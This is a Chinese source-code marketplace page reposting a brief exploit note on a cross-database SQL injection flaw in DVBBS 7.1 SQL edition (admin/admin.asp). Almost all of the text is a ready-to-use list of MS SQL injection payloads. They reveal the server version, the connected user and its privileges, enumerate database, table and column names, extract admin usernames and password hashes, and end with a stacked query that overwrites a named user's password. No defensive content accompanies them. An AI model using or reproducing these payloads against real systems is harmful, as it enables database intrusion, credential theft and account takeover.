源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

申请开店
全部源码分类
首页 源码街 任务需求 版权中心 备案服务 商家入驻

DVBBS7.1 SQL版 跨库漏洞

  • 时间:2022-02-06 14:58 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:DVBBS7.1 SQL版 跨库漏洞
漏洞测试环境:DVBBS7.1 SQL  受影响文件  admin/admin.asp  .....  漏洞利用  (select @@version)>0 获得Windows的版本号  and user_name()='dbo' 判断当前系统的连接用户是不是sa  (select user_name())>0 爆当前系统的连接用户  (select db_name())>0 得到当前连接的数据库  (select IS_MEMBER('db_owner')) --查询数据库当前用户权限  (select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查询所有数据库名  (select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') --查询数据库表名  (select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin')) --查询数据库所有表名  (select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) --查询表名ID  (select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名  (select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname')) --查询所有字段名  (select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户  (select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -查询用户bluefire密码  ;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--  
  • 全部评论(0)
上一篇:Debian灾难性漏洞
下一篇:SQL Server 2000 注入防护大全(一)
关于我们 | 广告合作 | 联系我们 | 隐私条款 | 免责声明 | 网站地图

苏ICP备2024110244号-2      苏公网安备32050702011978号      增值电信业务经营许可证编号:苏B2-20251499   |  Copyright 2018 - 2025   源码网商城 (www.ymwmall.com) 版权所有

联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部